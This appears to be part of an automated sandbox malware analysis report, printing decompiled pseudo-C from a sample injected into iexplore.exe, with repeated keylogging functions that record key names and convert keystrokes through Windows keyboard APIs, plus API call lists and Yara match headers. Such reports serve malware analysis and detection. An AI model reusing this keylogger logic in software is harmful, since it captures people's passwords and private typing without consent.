Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F4], xrefs: 00C85BD2

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C03, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C03(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F7]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F7], xrefs: 00C85C05

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8586D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8586D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad /]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Numpad /], xrefs: 00C8586F
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8585C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8585C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad .]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[Numpad .], xrefs: 00C8585E
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85AD1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AD1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F12]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[F12], xrefs: 00C85AD3
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A27, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A27(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Zoom]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Zoom], xrefs: 00C85A29

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B59, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B59(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F2]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings
